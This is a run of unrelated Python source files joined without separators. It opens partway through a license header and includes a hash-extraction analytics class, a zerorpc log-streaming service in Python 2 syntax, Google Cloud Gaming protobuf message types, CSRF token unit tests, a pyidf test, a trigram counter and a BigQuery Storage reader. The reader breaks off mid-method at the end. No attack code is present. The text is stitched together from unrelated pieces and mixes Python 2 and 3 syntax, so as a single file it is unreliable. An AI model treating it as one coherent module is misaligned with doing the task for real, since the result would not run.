# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


def strip_region_tags(sample_text):
    """Remove blank lines and region tags from sample text"""
    magic_lines = [
        line for line in sample_text.split("\n") if len(line) > 0 and "# [" not in line
    ]
    return "\n".join(magic_lines)

import hashlib

from core.analytics import InlineAnalytics
from core.observables import Hash

HASH_TYPES_DICT = {
    "md5": hashlib.md5,
    "sha1": hashlib.sha1,
    "sha256": hashlib.sha256,
    "sha512": hashlib.sha512,
}


class HashFile(InlineAnalytics):

    default_values = {
        "name": "HashFile",
        "description": "Extracts MD5, SHA1, SHA256, SHA512 hashes from file",
    }

    ACTS_ON = ["File", "Certificate"]

    @staticmethod
    def each(f):
        if f.body:
            f.hashes = []
            for hash_type, h in HashFile.extract_hashes(f.body.contents):
                hash_object = Hash.get_or_create(value=h.hexdigest())
                hash_object.add_source("analytics")
                hash_object.save()
                f.active_link_to(
                    hash_object,
                    "{} hash".format(hash_type.upper()),
                    "HashFile",
                    clean_old=False,
                )
                f.hashes.append({"hash": hash_type, "value": h.hexdigest()})
            f.save()

    @staticmethod
    def extract_hashes(body_contents):
        hashers = {k: HASH_TYPES_DICT[k]() for k in HASH_TYPES_DICT}

        while True:
            chunk = body_contents.read(512 * 16)
            if not chunk:
                break
            for h in hashers.values():
                h.update(chunk)

        return hashers.items()

import zerorpc
import gevent.queue
import logging
import sys

logging.basicConfig()

# root logger
logger = logging.getLogger()

# set the mimimum level for root logger so it will be possible for a client 
# to subscribe and receive logs for any log level
logger.setLevel(0)


class QueueingLogHandler(logging.Handler):
    """ A simple logging handler which puts all emitted logs into a
        gevent queue.
    """

    def __init__(self, queue, level, formatter):
        super(QueueingLogHandler, self).__init__()
        self._queue = queue
        self.setLevel(level)
        self.setFormatter(formatter)
    
    def emit(self, record):
        msg = self.format(record)
        self._queue.put_nowait(msg)
    
    def close(self):
        super(QueueingLogHandler, self).close()
        self._queue.put_nowait(None)
    
    @property
    def emitted(self):
        return self._queue


class TestService(object):
    
    _HANDLER_CLASS = QueueingLogHandler
    _DEFAULT_FORMAT = '%(name)s - %(levelname)s - %(asctime)s - %(message)s'
    
    logger = logging.getLogger("service")

    def __init__(self):
        self._logging_handlers = set()
    
    def test(self, logger_name, logger_level, message):
        logger = logging.getLogger(logger_name)
        getattr(logger, logger_level.lower())(message)

    def available_loggers(self):
        """ List of initalized loggers """
        return logging.getLogger().manager.loggerDict.keys()
    
    def close_log_streams(self):
        """ Closes all log_stream streams. """
        while self._logging_handlers:
            self._logging_handlers.pop().close()

    @zerorpc.stream
    def log_stream(self, logger_name, level_name, format_str):
        """ Attaches a log handler to the specified logger and sends emitted logs 
            back as stream. 
        """
        if logger_name != "" and logger_name not in self.available_loggers():
            raise ValueError("logger {0} is not available".format(logger_name))

        level_name_upper = level_name.upper() if level_name else "NOTSET"
        try:
            level = getattr(logging, level_name_upper)
        except AttributeError, e:
            raise AttributeError("log level {0} is not available".format(level_name_upper))
        
        q = gevent.queue.Queue()
        fmt = format_str if format_str.strip() else self._DEFAULT_FORMAT 
        
        logger = logging.getLogger(logger_name)
        formatter = logging.Formatter(fmt)
        handler = self._HANDLER_CLASS(q, level, formatter)
        
        logger.addHandler(handler)
        self._logging_handlers.add(handler)

        self.logger.debug("new subscriber for {0}/{1}".format(logger_name or "root", level_name_upper))
        try:
            for msg in handler.emitted:
                if msg is None:
                    return
                yield msg
        finally:
            self._logging_handlers.discard(handler)
            handler.close()
            self.logger.debug("subscription finished for {0}/{1}".format(logger_name or "root", level_name_upper))
    
    
if __name__ == "__main__":
    service = TestService()
    server = zerorpc.Server(service)
    server.bind(sys.argv[1])
    logger.warning("starting service")
    try: 
        server.run()
    except BaseException, e:
        logger.error(str(e))
    finally:
        logger.warning("shutting down")



# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto  # type: ignore

from google.protobuf import duration_pb2  # type: ignore
from google.protobuf import timestamp_pb2  # type: ignore


__protobuf__ = proto.module(
    package="google.cloud.gaming.v1",
    manifest={
        "OperationMetadata",
        "OperationStatus",
        "LabelSelector",
        "RealmSelector",
        "Schedule",
        "SpecSource",
        "TargetDetails",
        "TargetState",
        "DeployedFleetDetails",
    },
)


class OperationMetadata(proto.Message):
    r"""Represents the metadata of the long-running operation.

    Attributes:
        create_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The time the operation was
            created.
        end_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The time the operation finished
            running.
        target (str):
            Output only. Server-defined resource path for
            the target of the operation.
        verb (str):
            Output only. Name of the verb executed by the
            operation.
        status_message (str):
            Output only. Human-readable status of the
            operation, if any.
        requested_cancellation (bool):
            Output only. Identifies whether the user has requested
            cancellation of the operation. Operations that have
            successfully been cancelled have [Operation.error][] value
            with a [google.rpc.Status.code][google.rpc.Status.code] of
            1, corresponding to ``Code.CANCELLED``.
        api_version (str):
            Output only. API version used to start the
            operation.
        unreachable (Sequence[str]):
            Output only. List of Locations that could not
            be reached.
        operation_status (Sequence[google.cloud.gaming_v1.types.OperationMetadata.OperationStatusEntry]):
            Output only. Operation status for Game
            Services API operations. Operation status is in
            the form of key-value pairs where keys are
            resource IDs and the values show the status of
            the operation. In case of failures, the value
            includes an error code and error message.
    """

    create_time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
    end_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
    target = proto.Field(proto.STRING, number=3,)
    verb = proto.Field(proto.STRING, number=4,)
    status_message = proto.Field(proto.STRING, number=5,)
    requested_cancellation = proto.Field(proto.BOOL, number=6,)
    api_version = proto.Field(proto.STRING, number=7,)
    unreachable = proto.RepeatedField(proto.STRING, number=8,)
    operation_status = proto.MapField(
        proto.STRING, proto.MESSAGE, number=9, message="OperationStatus",
    )


class OperationStatus(proto.Message):
    r"""

    Attributes:
        done (bool):
            Output only. Whether the operation is done or
            still in progress.
        error_code (google.cloud.gaming_v1.types.OperationStatus.ErrorCode):
            The error code in case of failures.
        error_message (str):
            The human-readable error message.
    """

    class ErrorCode(proto.Enum):
        r""""""
        ERROR_CODE_UNSPECIFIED = 0
        INTERNAL_ERROR = 1
        PERMISSION_DENIED = 2
        CLUSTER_CONNECTION = 3

    done = proto.Field(proto.BOOL, number=1,)
    error_code = proto.Field(proto.ENUM, number=2, enum=ErrorCode,)
    error_message = proto.Field(proto.STRING, number=3,)


class LabelSelector(proto.Message):
    r"""The label selector, used to group labels on the resources.

    Attributes:
        labels (Sequence[google.cloud.gaming_v1.types.LabelSelector.LabelsEntry]):
            Resource labels for this selector.
    """

    labels = proto.MapField(proto.STRING, proto.STRING, number=1,)


class RealmSelector(proto.Message):
    r"""The realm selector, used to match realm resources.

    Attributes:
        realms (Sequence[str]):
            List of realms to match.
    """

    realms = proto.RepeatedField(proto.STRING, number=1,)


class Schedule(proto.Message):
    r"""The schedule of a recurring or one time event. The event's time span
    is specified by start_time and end_time. If the scheduled event's
    timespan is larger than the cron_spec + cron_job_duration, the event
    will be recurring. If only cron_spec + cron_job_duration are
    specified, the event is effective starting at the local time
    specified by cron_spec, and is recurring.

    ::

       start_time|-------[cron job]-------[cron job]-------[cron job]---|end_time
       cron job: cron spec start time + duration

    Attributes:
        start_time (google.protobuf.timestamp_pb2.Timestamp):
            The start time of the event.
        end_time (google.protobuf.timestamp_pb2.Timestamp):
            The end time of the event.
        cron_job_duration (google.protobuf.duration_pb2.Duration):
            The duration for the cron job event. The
            duration of the event is effective after the
            cron job's start time.
        cron_spec (str):
            The cron definition of the scheduled event.
            See https://en.wikipedia.org/wiki/Cron. Cron
            spec specifies the local time as defined by the
            realm.
    """

    start_time = proto.Field(proto.MESSAGE, number=1, message=timestamp_pb2.Timestamp,)
    end_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
    cron_job_duration = proto.Field(
        proto.MESSAGE, number=3, message=duration_pb2.Duration,
    )
    cron_spec = proto.Field(proto.STRING, number=4,)


class SpecSource(proto.Message):
    r"""Encapsulates Agones fleet spec and Agones autoscaler spec
    sources.

    Attributes:
        game_server_config_name (str):
            The game server config resource. Uses the form:
            ``projects/{project}/locations/{location}/gameServerDeployments/{deployment_id}/configs/{config_id}``.
        name (str):
            The name of the Agones leet config or Agones
            scaling config used to derive the Agones fleet
            or Agones autoscaler spec.
    """

    game_server_config_name = proto.Field(proto.STRING, number=1,)
    name = proto.Field(proto.STRING, number=2,)


class TargetDetails(proto.Message):
    r"""Details about the Agones resources.

    Attributes:
        game_server_cluster_name (str):
            The game server cluster name. Uses the form:
            ``projects/{project}/locations/{location}/realms/{realm}/gameServerClusters/{cluster}``.
        game_server_deployment_name (str):
            The game server deployment name. Uses the form:
            ``projects/{project}/locations/{location}/gameServerDeployments/{deployment_id}``.
        fleet_details (Sequence[google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails]):
            Agones fleet details for game server clusters
            and game server deployments.
    """

    class TargetFleetDetails(proto.Message):
        r"""Details of the target Agones fleet.

        Attributes:
            fleet (google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails.TargetFleet):
                Reference to target Agones fleet.
            autoscaler (google.cloud.gaming_v1.types.TargetDetails.TargetFleetDetails.TargetFleetAutoscaler):
                Reference to target Agones fleet autoscaling
                policy.
        """

        class TargetFleet(proto.Message):
            r"""Target Agones fleet specification.

            Attributes:
                name (str):
                    The name of the Agones fleet.
                spec_source (google.cloud.gaming_v1.types.SpecSource):
                    Encapsulates the source of the Agones fleet
                    spec. The Agones fleet spec source.
            """

            name = proto.Field(proto.STRING, number=1,)
            spec_source = proto.Field(proto.MESSAGE, number=2, message="SpecSource",)

        class TargetFleetAutoscaler(proto.Message):
            r"""Target Agones autoscaler policy reference.

            Attributes:
                name (str):
                    The name of the Agones autoscaler.
                spec_source (google.cloud.gaming_v1.types.SpecSource):
                    Encapsulates the source of the Agones fleet
                    spec. Details about the Agones autoscaler spec.
            """

            name = proto.Field(proto.STRING, number=1,)
            spec_source = proto.Field(proto.MESSAGE, number=2, message="SpecSource",)

        fleet = proto.Field(
            proto.MESSAGE,
            number=1,
            message="TargetDetails.TargetFleetDetails.TargetFleet",
        )
        autoscaler = proto.Field(
            proto.MESSAGE,
            number=2,
            message="TargetDetails.TargetFleetDetails.TargetFleetAutoscaler",
        )

    game_server_cluster_name = proto.Field(proto.STRING, number=1,)
    game_server_deployment_name = proto.Field(proto.STRING, number=2,)
    fleet_details = proto.RepeatedField(
        proto.MESSAGE, number=3, message=TargetFleetDetails,
    )


class TargetState(proto.Message):
    r"""Encapsulates the Target state.

    Attributes:
        details (Sequence[google.cloud.gaming_v1.types.TargetDetails]):
            Details about Agones fleets.
    """

    details = proto.RepeatedField(proto.MESSAGE, number=1, message="TargetDetails",)


class DeployedFleetDetails(proto.Message):
    r"""Details of the deployed Agones fleet.

    Attributes:
        deployed_fleet (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleet):
            Information about the Agones fleet.
        deployed_autoscaler (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleetAutoscaler):
            Information about the Agones autoscaler for
            that fleet.
    """

    class DeployedFleet(proto.Message):
        r"""Agones fleet specification and details.

        Attributes:
            fleet (str):
                The name of the Agones fleet.
            fleet_spec (str):
                The fleet spec retrieved from the Agones
                fleet.
            spec_source (google.cloud.gaming_v1.types.SpecSource):
                The source spec that is used to create the
                Agones fleet. The GameServerConfig resource may
                no longer exist in the system.
            status (google.cloud.gaming_v1.types.DeployedFleetDetails.DeployedFleet.DeployedFleetStatus):
                The current status of the Agones fleet.
                Includes count of game servers in various
                states.
        """

        class DeployedFleetStatus(proto.Message):
            r"""DeployedFleetStatus has details about the Agones fleets such
            as how many are running, how many allocated, and so on.

            Attributes:
                ready_replicas (int):
                    The number of GameServer replicas in the
                    READY state in this fleet.
                allocated_replicas (int):
                    The number of GameServer replicas in the
                    ALLOCATED state in this fleet.
                reserved_replicas (int):
                    The number of GameServer replicas in the
                    RESERVED state in this fleet. Reserved instances
                    won't be deleted on scale down, but won't cause
                    an autoscaler to scale up.
                replicas (int):
                    The total number of current GameServer
                    replicas in this fleet.
            """

            ready_replicas = proto.Field(proto.INT64, number=1,)
            allocated_replicas = proto.Field(proto.INT64, number=2,)
            reserved_replicas = proto.Field(proto.INT64, number=3,)
            replicas = proto.Field(proto.INT64, number=4,)

        fleet = proto.Field(proto.STRING, number=1,)
        fleet_spec = proto.Field(proto.STRING, number=2,)
        spec_source = proto.Field(proto.MESSAGE, number=3, message="SpecSource",)
        status = proto.Field(
            proto.MESSAGE,
            number=5,
            message="DeployedFleetDetails.DeployedFleet.DeployedFleetStatus",
        )

    class DeployedFleetAutoscaler(proto.Message):
        r"""Details about the Agones autoscaler.

        Attributes:
            autoscaler (str):
                The name of the Agones autoscaler.
            spec_source (google.cloud.gaming_v1.types.SpecSource):
                The source spec that is used to create the
                autoscaler. The GameServerConfig resource may no
                longer exist in the system.
            fleet_autoscaler_spec (str):
                The autoscaler spec retrieved from Agones.
        """

        autoscaler = proto.Field(proto.STRING, number=1,)
        spec_source = proto.Field(proto.MESSAGE, number=4, message="SpecSource",)
        fleet_autoscaler_spec = proto.Field(proto.STRING, number=3,)

    deployed_fleet = proto.Field(proto.MESSAGE, number=1, message=DeployedFleet,)
    deployed_autoscaler = proto.Field(
        proto.MESSAGE, number=2, message=DeployedFleetAutoscaler,
    )


__all__ = tuple(sorted(__protobuf__.manifest))

from changes.api.serializer import Crumbler, register
from changes.models.node import Cluster


@register(Cluster)
class ClusterCrumbler(Crumbler):
    def crumble(self, instance, attrs):
        return {
            'id': instance.id.hex,
            'name': instance.label,
            'dateCreated': instance.date_created,
        }

"""Tests for the CSRF helper."""

import unittest

import mock
import webapp2
import webtest

from ctc.helpers import csrf
from ctc.testing import testutil


MOCKED_TIME = 123


# Tests don't need docstrings, so pylint: disable=C0111
# Tests can test protected members, so pylint: disable=W0212
class CsrfTests(testutil.CtcTestCase):

    # Helpers

    class TestHandler(csrf.CsrfHandler):
        """A handler for testing whether or not requests are CSRF protected."""

        def get(self):
            self.response.write('CSRF Token:%s' % self.csrf_token)

        def post(self):
            pass

        def put(self):
            pass

        def delete(self):
            pass

    def setUp(self):
        super(CsrfTests, self).setUp()
        # The CSRF library uses the time, so we mock it out.
        self.time_mock = mock.Mock()
        csrf.time = self.time_mock
        self.time_mock.time = mock.Mock(return_value=MOCKED_TIME)
        # The handler tests need a WSGIApplication.
        app = webapp2.WSGIApplication([('/', self.TestHandler)])
        self.testapp = webtest.TestApp(app)

    def test_get_secret_key(self):
        first_key = csrf._get_secret_key()
        self.assertEqual(len(first_key), 32)
        second_key = csrf._get_secret_key()
        self.assertEqual(first_key, second_key)

    def test_tokens_are_equal(self):
        # It should fail if the tokens aren't equal length.
        self.assertFalse(csrf._tokens_are_equal('a', 'ab'))
        # It should fail if the tokens are different.
        self.assertFalse(csrf._tokens_are_equal('abcde', 'abcdf'))
        # It should succeed if the tokens are the same.
        self.assertTrue(csrf._tokens_are_equal('abcde', 'abcde'))

    # Make Token

    def test_make_token_includes_time(self):
        self.login()
        # It should get the current time.
        token1 = csrf.make_token()
        self.assertEqual(token1.split()[-1], str(MOCKED_TIME))
        # It should use the provided time.
        token2 = csrf.make_token(token_time='456')
        self.assertEqual(token2.split()[-1], '456')
        # Different time should cause the digest to be different.
        self.assertNotEqual(token1.split()[0], token2.split()[0])
        token3 = csrf.make_token(token_time='456')
        self.assertEqual(token2, token3)

    def test_make_token_requires_login(self):
        token1 = csrf.make_token()
        self.assertIsNone(token1)
        self.login()
        token2 = csrf.make_token()
        self.assertIsNotNone(token2)

    def test_make_token_includes_path(self):
        self.login()
        # It should get the current path.
        self.testbed.setup_env(PATH_INFO='/action/1', overwrite=True)
        token1 = csrf.make_token(token_time='123')
        self.testbed.setup_env(PATH_INFO='/action/23', overwrite=True)
        token2 = csrf.make_token(token_time='123')
        token3 = csrf.make_token(token_time='123')
        self.assertNotEqual(token1, token2)
        self.assertEqual(token2, token3)
        # It should let the client pass in a path.
        token4 = csrf.make_token(path='/action/4', token_time='123')
        token5 = csrf.make_token(path='/action/56', token_time='123')
        token6 = csrf.make_token(path='/action/56', token_time='123')
        self.assertNotEqual(token4, token5)
        self.assertEqual(token5, token6)

    # Token Is Valid

    def test_token_is_valid(self):
        self.login()
        # Token is required.
        self.assertFalse(csrf.token_is_valid(None))
        # Token needs to have a timestamp on it.
        self.assertFalse(csrf.token_is_valid('hello'))
        # The timestamp needs to be within the current date range.
        self.time_mock.time = mock.Mock(return_value=9999999999999)
        self.assertFalse(csrf.token_is_valid('hello 123'))
        # The user needs to be logged in.
        token = csrf.make_token()
        self.logout()
        self.assertFalse(csrf.token_is_valid(token))
        self.login()
        # Modifying the token should break everything.
        modified_token = '0' + token[1:]
        if token == modified_token:
            modified_token = '1' + token[1:]
        self.assertFalse(csrf.token_is_valid(modified_token))
        # The original token that we got should work.
        self.assertTrue(csrf.token_is_valid(token))

    def test_get_has_csrf_token(self):
        self.login()
        response = self.testapp.get('/', status=200).body
        self.assertIn('CSRF Token:', response)
        self.assertEqual(response.split(':')[-1], csrf.make_token())

    def test_mutators_require_csrf_token(self):
        self.login()
        self.testapp.put('/', status=403)
        self.testapp.post('/', status=403)
        self.testapp.delete('/', status=403)
        csrf_param = 'csrf_token=' + csrf.make_token(path='/')
        self.testapp.put('/', params=csrf_param, status=200)
        self.testapp.post('/', params=csrf_param, status=200)
        # Though the spec allows DELETE to have a body, it tends to be ignored
        # by servers (http://stackoverflow.com/questions/299628), and webapp2
        # ignores it as well, so we have to put the params in the URL.
        self.testapp.delete('/?' + csrf_param, status=200)


if __name__ == '__main__':
    unittest.main()

# encoding: utf-8

u'''MCL — Publication Folder'''

from ._base import IIngestableFolder, Ingestor, IngestableFolderView
from .interfaces import IPublication
from five import grok


class IPublicationFolder(IIngestableFolder):
    u'''Folder containing publications.'''


class PublicationIngestor(Ingestor):
    u'''RDF ingestor for publication.'''
    grok.context(IPublicationFolder)
    def getContainedObjectInterface(self):
        return IPublication


class View(IngestableFolderView):
    u'''View for an publication folder'''
    grok.context(IPublicationFolder)

import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.exterior_equipment import ExteriorFuelEquipment

log = logging.getLogger(__name__)

class TestExteriorFuelEquipment(unittest.TestCase):

    def setUp(self):
        self.fd, self.path = tempfile.mkstemp()

    def tearDown(self):
        os.remove(self.path)

    def test_create_exteriorfuelequipment(self):

        pyidf.validation_level = ValidationLevel.error

        obj = ExteriorFuelEquipment()
        # alpha
        var_name = "Name"
        obj.name = var_name
        # alpha
        var_fuel_use_type = "Electricity"
        obj.fuel_use_type = var_fuel_use_type
        # object-list
        var_schedule_name = "object-list|Schedule Name"
        obj.schedule_name = var_schedule_name
        # real
        var_design_level = 0.0
        obj.design_level = var_design_level
        # alpha
        var_enduse_subcategory = "End-Use Subcategory"
        obj.enduse_subcategory = var_enduse_subcategory

        idf = IDF()
        idf.add(obj)
        idf.save(self.path, check=False)

        with open(self.path, mode='r') as f:
            for line in f:
                log.debug(line.strip())

        idf2 = IDF(self.path)
        self.assertEqual(idf2.exteriorfuelequipments[0].name, var_name)
        self.assertEqual(idf2.exteriorfuelequipments[0].fuel_use_type, var_fuel_use_type)
        self.assertEqual(idf2.exteriorfuelequipments[0].schedule_name, var_schedule_name)
        self.assertAlmostEqual(idf2.exteriorfuelequipments[0].design_level, var_design_level)
        self.assertEqual(idf2.exteriorfuelequipments[0].enduse_subcategory, var_enduse_subcategory)
from collections import defaultdict
import codecs

def count(corpus, output_file):
    debug = False
    dic = defaultdict(int)
    other = set()
    fout = codecs.open(output_file, 'w', 'utf8')
    for line in open(corpus, 'r'):
        words = line.split()
        for word in words:
            if len(word) % 3 == 0:
                for i in xrange(len(word) / 3):
                    dic[word[i:i+3]] += 1
            else:
                other.add(word)
    fout.write('%i %i\n' % (len(dic), len(other)))
    
    record_list = [(y, x) for x, y in dic.items()]
    record_list.sort()
    record_list.reverse()
    i = 0
    for x, y in record_list:
        #print y.decode('utf8'), x
        try:
            yy = y.decode('GBK')
        except:
            print y
            yy = 'N/A'
        fout.write('%s %i\n' % (yy, x))
        i += 1
        if i > 10 and debug:
            break

    other_list = list(other)
    other_list.sort()
    for item in other_list:
        #print item.decode('utf8')
        item2 = item.decode('utf8')
        fout.write(item2)
        fout.write('\n')
        i += 1
        if i > 20 and debug:
            break
    fout.close()

if __name__ =='__main__':
    count('data/train.zh_parsed', 'output/count.zh')
    count('data/train.ja_parsed', 'output/count.ja')

# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import absolute_import

import collections
import io
import json
import time

try:
    import fastavro
except ImportError:  # pragma: NO COVER
    fastavro = None
import google.api_core.exceptions
import google.rpc.error_details_pb2

try:
    import pandas
except ImportError:  # pragma: NO COVER
    pandas = None
try:
    import pyarrow
except ImportError:  # pragma: NO COVER
    pyarrow = None

try:
    import pyarrow
except ImportError:  # pragma: NO COVER
    pyarrow = None


_STREAM_RESUMPTION_EXCEPTIONS = (
    google.api_core.exceptions.ServiceUnavailable,
    # Caused by transport-level error. No status code was received.
    # https://github.com/googleapis/python-bigquery-storage/issues/262
    google.api_core.exceptions.Unknown,
)

# The Google API endpoint can unexpectedly close long-running HTTP/2 streams.
# Unfortunately, this condition is surfaced to the caller as an internal error
# by gRPC. We don't want to resume on all internal errors, so instead we look
# for error message that we know are caused by problems that are safe to
# reconnect.
_STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES = (
    # See: https://github.com/googleapis/google-cloud-python/pull/9994
    "RST_STREAM",
)

_FASTAVRO_REQUIRED = (
    "fastavro is required to parse ReadRowResponse messages with Avro bytes."
)
_PANDAS_REQUIRED = "pandas is required to create a DataFrame"
_PYARROW_REQUIRED = (
    "pyarrow is required to parse ReadRowResponse messages with Arrow bytes."
)


class ReadRowsStream(object):
    """A stream of results from a read rows request.

    This stream is an iterable of
    :class:`~google.cloud.bigquery_storage_v1.types.ReadRowsResponse`.
    Iterate over it to fetch all row messages.

    If the fastavro library is installed, use the
    :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.rows()`
    method to parse all messages into a stream of row dictionaries.

    If the pandas and fastavro libraries are installed, use the
    :func:`~google.cloud.bigquery_storage_v1.reader.ReadRowsStream.to_dataframe()`
    method to parse all messages into a :class:`pandas.DataFrame`.

    This object should not be created directly, but is returned by
    other methods in this library.
    """

    def __init__(
        self, client, name, offset, read_rows_kwargs, retry_delay_callback=None
    ):
        """Construct a ReadRowsStream.

        Args:
            client ( \
                ~google.cloud.bigquery_storage_v1.services. \
                    big_query_read.BigQueryReadClient \
            ):
                A GAPIC client used to reconnect to a ReadRows stream. This
                must be the GAPIC client to avoid a circular dependency on
                this class.
            name (str):
                Required. Stream ID from which rows are being read.
            offset (int):
                Required. Position in the stream to start
                reading from. The offset requested must be less than the last
                row read from ReadRows. Requesting a larger offset is
                undefined.
            read_rows_kwargs (dict):
                Keyword arguments to use when reconnecting to a ReadRows
                stream.
            retry_delay_callback (Optional[Callable[[float], None]]):
                If the client receives a retryable error that asks the client to
                delay its next attempt and retry_delay_callback is not None,
                ReadRowsStream will call retry_delay_callback with the delay
                duration (in seconds) before it starts sleeping until the next
                attempt.

        Returns:
            Iterable[ \
                ~google.cloud.bigquery_storage.types.ReadRowsResponse \
            ]:
                A sequence of row messages.
        """

        # Make a copy of the read position so that we can update it without
        # mutating the original input.
        self._client = client
        self._name = name
        self._offset = offset
        self._read_rows_kwargs = read_rows_kwargs
        self._retry_delay_callback = retry_delay_callback
        self._wrapped = None

    def __iter__(self):
        """An iterable of messages.

        Returns:
            Iterable[ \
                ~google.cloud.bigquery_storage_v1.types.ReadRowsResponse \
            ]:
                A sequence of row messages.
        """
        # Infinite loop to reconnect on reconnectable errors while processing
        # the row stream.

        if self._wrapped is None:
            self._reconnect()

        while True:
            try:
                for message in self._wrapped:
                    rowcount = message.row_count
                    self._offset += rowcount
                    yield message

                return  # Made it through the whole stream.
            except google.api_core.exceptions.InternalServerError as exc:
                resumable_error = any(
                    resumable_message in exc.message
                    for resumable_message in _STREAM_RESUMPTION_INTERNAL_ERROR_MESSAGES
                )
                if not resumable_error:
                    raise
            except _STREAM_RESUMPTION_EXCEPTIONS:
                # Transient error, so reconnect to the stream.
                pass
            except Exception as exc:
                if not self._resource_exhausted_exception_is_retryable(exc):
                    raise

            self._reconnect()

    def _reconnect(self):
        """Reconnect to the ReadRows stream using the most recent offset."""
        while True:
            try:
                self._wrapped = self._client.read_rows(
                    read_stream=self._name,
                    offset=self._offset,
                    **self._read_rows_kwargs
                )
                break
            except Exception as exc:
                if not self._resource_exhausted_exception_is_retryable(exc):
                    raise

    def _resource_exhausted_exception_is_retryable(self, exc):
        if isinstance(exc, google.api_core.exceptions.ResourceExhausted):
            # ResourceExhausted errors are only retried if a valid
            # RetryInfo is provided with the error.
            #
            # TODO: Remove hasattr logic when we require google-api-core >= 2.2.0.
            #       ResourceExhausted added details/_details in google-api-core 2.2.0.
            details = None
            if hasattr(exc, "details"):
                details = exc.details
            elif hasattr(exc, "_details"):
                details = exc._details
            if details is not None:
                for detail in details:
                    if isinstance(detail, google.rpc.error_details_pb2.RetryInfo):
                        retry_delay = detail.retry_delay
                        if retry_delay is not None:
                            delay = max(
                                0,
                                float(retry_delay.seconds)
                                + (float(retry_delay.nanos) / 1e9),
                            )
                            if self._retry_delay_callback:
                                self._retry_delay_callback(delay)
                            time.sleep(delay)
                            return True
        return False

    def rows(self, read_session=None):
        """Iterate over all rows in the stream.

        This method requires the fastavro library in order to parse row
        messages in avro format.  For arrow format messages, the pyarrow
        library is required.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings in the fastavro library.

        Args:
            read_session ( \
                Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.

        Returns:
            Iterable[Mapping]:
                A sequence of rows, represented as dictionaries.
        """
        return ReadRowsIterable(self, read_session=read_session)

    def to_arrow(self, read_session=None):
        """Create a :class:`pyarrow.Table` of all rows in the stream.

        This method requires the pyarrow library and a stream using the Arrow
        format.

        Args:
            read_session ( \
                ~google.cloud.bigquery_storage_v1.types.ReadSession \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.

        Returns:
            pyarrow.Table:
                A table of all rows in the stream.
        """
        return self.rows(read_session=read_session).to_arrow()

    def to_dataframe(self, read_session=None, dtypes=None):
        """Create a :class:`pandas.DataFrame` of all rows in the stream.

        This method requires the pandas libary to create a data frame and the
        fastavro library to parse row messages.

        .. warning::
            DATETIME columns are not supported. They are currently parsed as
            strings.

        Args:
            read_session ( \
                ~google.cloud.bigquery_storage_v1.types.ReadSession \
            ):
                DEPRECATED.

                This argument was used to specify the schema of the rows in the
                stream, but now the first message in a read stream contains
                this information.
            dtypes ( \
                Map[str, Union[str, pandas.Series.dtype]] \
            ):
                Optional. A dictionary of column names pandas ``dtype``s. The
                provided ``dtype`` is used when constructing the series for
                the column specified. Otherwise, the default pandas behavior
                is used.

        Returns:
            pandas.DataFrame:
                A data frame of all rows in the stream.
        """
        if pandas is None:
            raise ImportError(_PANDAS_REQUIRED)

        return self.rows(read_session=read_session).to_dataframe(dtypes=dtypes)


class ReadRowsIterable(object):
    """An iterable of rows from a read session.

    Args:
        reader (google.cloud.bigquery_storage_v1.reader.ReadRowsStream):
            A read rows stream.
        read_session ( \
            Optional[~google.cloud.bigquery_storage_v1.types.ReadSession] \
        ):
            DEPRECATED.

            This argument was used to specify the schema of the rows in the
            stream, but now the first message in a read stream contains
            this information.
    """

    # This class is modelled after the google.cloud.bigquery.table.RowIterator
    # and aims to be API compatible where possible.

    def __init__(self, reader, read_session=None):
        self._reader = reader
        if read_session is not None:
            self._stream_parser = _StreamParser.from_read_session(read_session)
        else:
            self._stream_parser = None

    @property
    def pages(self):
        """A generator of all pages in the stream.

        Returns:
            types.GeneratorType[google.cloud.bigquery_storage_v1.ReadRowsPage]:
                A generator of pages.
        """
        # Each page is an iterator of rows. But also has num_items, remaining,
        # and to_dataframe.
        for message in self._reader:
            # Only the first message contains the schema, which is needed to
            # decode the messages.
            if not self._stream_parser:
                self._stream_parser = _StreamParser.from_read_rows_response(message)
            yield ReadRowsPage(self._stream_parser, message)

    def __iter__(self):
        """Iterator for each row in all pages."""
        for page in self.pages:
            for row in page:
                yield row

    def to_arrow(self):
        """Create a :class:`pyarrow.Table` of all rows in the stream.

        This method requires the pyarrow library and a stream using the Arrow
        format.

        Returns:
            pyarrow.Table:
                A table of all rows in the stream.
        """
        record_batches = []
        for page in self.pages:
            record_batches.append(page.to_arrow())

        if record_batches:
            return pyarrow.Table.from_batches(record_batches)

        # No data, return an empty Table.
